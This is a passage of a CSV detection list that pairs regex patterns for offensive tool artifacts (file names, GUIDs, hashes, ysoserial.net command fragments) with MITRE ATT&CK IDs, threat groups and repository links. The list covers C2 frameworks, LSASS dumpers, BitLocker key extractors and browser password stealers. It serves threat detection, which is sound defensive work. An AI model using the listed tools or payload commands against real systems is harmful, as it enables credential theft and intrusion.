security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43631" "*ExtensionSpoof.vbproj*",".{0,1000}ExtensionSpoof\.vbproj.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","N/A","N/A","9","2","179","65","2024-12-12T18:05:28Z","2017-11-11T16:02:17Z","43632" "*ExtensionSpoof.xml*",".{0,1000}ExtensionSpoof\.xml.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","N/A","N/A","9","2","179","65","2024-12-12T18:05:28Z","2017-11-11T16:02:17Z","43633" "*ExtensionSpoofer-1.zip*",".{0,1000}ExtensionSpoofer\-1\.zip.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","1","N/A","N/A","9","2","179","65","2024-12-12T18:05:28Z","2017-11-11T16:02:17Z","43634" "*External Drive Password Recovery*",".{0,1000}External\sDrive\sPassword\sRecovery.{0,1000}","offensive_tool_keyword","ExtPassword.exe","Nirsoft tool for Windows that allows you to recover passwords stored on external drive plugged to your 
computer","T1081 - T1003 - T1212","TA0006 - TA0009","N/A","LockBit","Credential Access","https://www.nirsoft.net/utils/external_drive_password_recovery.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","43635" "*external_c2.cna*",".{0,1000}external_c2\.cna.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","43636" "*ExternalC2.*",".{0,1000}ExternalC2\..{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","43637" "*ExternalC2.dll*",".{0,1000}ExternalC2\.dll.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","43638" "*ExternalC2.Net*",".{0,1000}ExternalC2\.Net.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","43639" "*ExternalC2.Net.*",".{0,1000}ExternalC2\.Net\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","43640" "*externalc2.py*",".{0,1000}externalc2\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","43641" "*ExternalC2\*",".{0,1000}ExternalC2\\.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","43642" 
"*externalc2_start*",".{0,1000}externalc2_start.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","43643" "*ExternalC2Core*",".{0,1000}ExternalC2Core.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","43644" "*ExternalC2-master*",".{0,1000}ExternalC2\-master.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","43645" "*ExternalC2Tests*",".{0,1000}ExternalC2Tests.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","43646" "*ExternalC2Web*",".{0,1000}ExternalC2Web.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","43647" "*ExternalRecon.ps1*",".{0,1000}ExternalRecon\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","43649" "*ExtPassword.exe*",".{0,1000}ExtPassword\.exe.{0,1000}","offensive_tool_keyword","ExtPassword.exe","Nirsoft tool for Windows that allows you to recover passwords stored on external drive plugged to your computer","T1081 - T1003 - T1212","TA0006 - TA0009","N/A","LockBit","Credential Access","https://www.nirsoft.net/utils/external_drive_password_recovery.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","43650" "*extract_cmd_exec*.js*",".{0,1000}extract_cmd_exec.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","43651" "*extract_cmd_exec*.rb*",".{0,1000}extract_cmd_exec.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","43652" "*extract_reflective_loader*",".{0,1000}extract_reflective_loader.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","43653" "*ExtractBitLockerKeys*@podalirius_*",".{0,1000}ExtractBitLockerKeys.{0,1000}\@podalirius_.{0,1000}","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","0","N/A","N/A","10","4","368","54","2025-01-31T09:39:55Z","2023-09-19T07:28:11Z","43654" "*ExtractBitlockerKeys.ps1*",".{0,1000}ExtractBitlockerKeys\.ps1.{0,1000}","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","N/A","10","4","368","54","2025-01-31T09:39:55Z","2023-09-19T07:28:11Z","43655" "*ExtractBitlockerKeys.py*",".{0,1000}ExtractBitlockerKeys\.py.{0,1000}","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","N/A","10","4","368","54","2025-01-31T09:39:55Z","2023-09-19T07:28:11Z","43656" "*ExtractBitlockerKeys-main*",".{0,1000}ExtractBitlockerKeys\-main.{0,1000}","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential 
Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","N/A","10","4","368","54","2025-01-31T09:39:55Z","2023-09-19T07:28:11Z","43657" "*ExtractDataXML_BruteForce*",".{0,1000}ExtractDataXML_BruteForce.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","43658" "*ExtractFileInfoViaNTDLL*",".{0,1000}ExtractFileInfoViaNTDLL.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","43659" "*ExtractFirefoxProfileData(*",".{0,1000}ExtractFirefoxProfileData\(.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","43660" "*Extract-HijackableKeysFromProcmonCSV*",".{0,1000}Extract\-HijackableKeysFromProcmonCSV.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - 
TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","43661" "*extraction_folder*TotalRecall.txt*",".{0,1000}extraction_folder.{0,1000}TotalRecall\.txt.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","N/A","N/A","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","43662" "*extracts the AES 128/256 keys from Policy.vpol*",".{0,1000}extracts\sthe\sAES\s128\/256\skeys\sfrom\sPolicy\.vpol.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","43663" "*extracttgsrepfrompcap.py*",".{0,1000}extracttgsrepfrompcap\.py.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","N/A","1","73","18","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z","43664" "*extra-scripts*timecrack.py*",".{0,1000}extra\-scripts.{0,1000}timecrack\.py.{0,1000}","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with 
that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","N/A","10","3","282","28","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z","43665" "*eyewitness -f urls.txt --web*",".{0,1000}eyewitness\s\-f\surls\.txt\s\-\-web.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","43666" "*-f BinaryFormatter -g PSObject -o base64 -c *",".{0,1000}\-f\sBinaryFormatter\s\-g\sPSObject\s\-o\sbase64\s\-c\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","43667" "*-f Json.Net -g ObjectDataProvider -o raw -c *",".{0,1000}\-f\sJson\.Net\s\-g\sObjectDataProvider\s\-o\sraw\s\-c\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","43668" "*-f payloads_examples/calc.*",".{0,1000}\-f\spayloads_examples\/calc\..{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","N/A","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","43669" "*f:\temp\pass.html*",".{0,1000}f\:\\temp\\pass\.html.{0,1000}","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1081 - T1003 - T1555","TA0006 - TA0009","N/A","Kimsuky - XDSpy - TRAVELING SPIDER","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","43670" "*f:\temp\passwords.html*",".{0,1000}f\:\\temp\\passwords\.html.{0,1000}","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. 
as long as the password is stored by your Web Browser.","T1003 - T1555 - T1503","TA0006 - TA0007 - TA0009","N/A","Phobos - GoGoogle - 8BASE - Kimsuky - Dispossessor - Loki","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","43671" "*F0005D08-6278-4BFE-B492-F86CCEC797D5*",".{0,1000}F0005D08\-6278\-4BFE\-B492\-F86CCEC797D5.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","43672" "*f0037d99bc3119fc613d304af20599e8c791b1c99208d5d452a01738777f7b49*",".{0,1000}f0037d99bc3119fc613d304af20599e8c791b1c99208d5d452a01738777f7b49.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","0","#filehash","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","43673" "*F00A3B5F-D9A9-4582-BBCE-FD10EFBF0C17*",".{0,1000}F00A3B5F\-D9A9\-4582\-BBCE\-FD10EFBF0C17.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","#GUIDproject","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","43676" "*f01d1e178abb9200266fd816ec512b33f5f1b76f8d5d3953678c42003e526692*",".{0,1000}f01d1e178abb9200266fd816ec512b33f5f1b76f8d5d3953678c42003e526692.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs 
network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","43678" "*f02faf2b5816db6bd67fdbe432b87ad6c9e2d79a7251e81a0c9acd3d8dd28bba*",".{0,1000}f02faf2b5816db6bd67fdbe432b87ad6c9e2d79a7251e81a0c9acd3d8dd28bba.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","43680" "*f036df2efba311e876debab785e546149cb15021ffa32294faea444ae499561e*",".{0,1000}f036df2efba311e876debab785e546149cb15021ffa32294faea444ae499561e.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","43681" "*f038fdbc3ed50ebbf1ebc1c814836bcf93b4c149e5856ccf9b5400da8a974117*",".{0,1000}f038fdbc3ed50ebbf1ebc1c814836bcf93b4c149e5856ccf9b5400da8a974117.{0,1000}","offensive_tool_keyword","DumpNParse","A Combination LSASS Dumper and LSASS Parser","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/icyguider/DumpNParse","1","0","#filehash","N/A","10","2","150","24","2021-11-21T14:25:24Z","2021-11-21T14:18:42Z","43682" 
"*f038fdbc3ed50ebbf1ebc1c814836bcf93b4c149e5856ccf9b5400da8a974117*",".{0,1000}f038fdbc3ed50ebbf1ebc1c814836bcf93b4c149e5856ccf9b5400da8a974117.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","#filehash","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","43683" "*f0421fe369c03c1172e8f88730dbb20e427673c878d37a63a192dccca0be5d93*",".{0,1000}f0421fe369c03c1172e8f88730dbb20e427673c878d37a63a192dccca0be5d93.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","43684" "*f049f7c98172f7696d6a0b312c91010720970f825eb4cff5c76c151e15f16951*",".{0,1000}f049f7c98172f7696d6a0b312c91010720970f825eb4cff5c76c151e15f16951.{0,1000}","offensive_tool_keyword","TokenFinder","Tool to extract powerful tokens from Office desktop apps memory","T1003 - T1081 - T1110","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/doredry/TokenFinder","1","0","#filehash","N/A","9","1","71","10","2024-03-01T14:27:34Z","2022-09-21T14:21:07Z","43688" "*f04a52623464ec2eb52b22e7348993bf5b7456714505f87342781b8d21c7233c*",".{0,1000}f04a52623464ec2eb52b22e7348993bf5b7456714505f87342781b8d21c7233c.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","43689" "*f04b79d7179c98ce705876849a20f67bcff5c977f4f7865226e26296f1e80966*",".{0,1000}f04b79d7179c98ce705876849a20f67bcff5c977f4f7865226e26296f1e80966.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43690" 
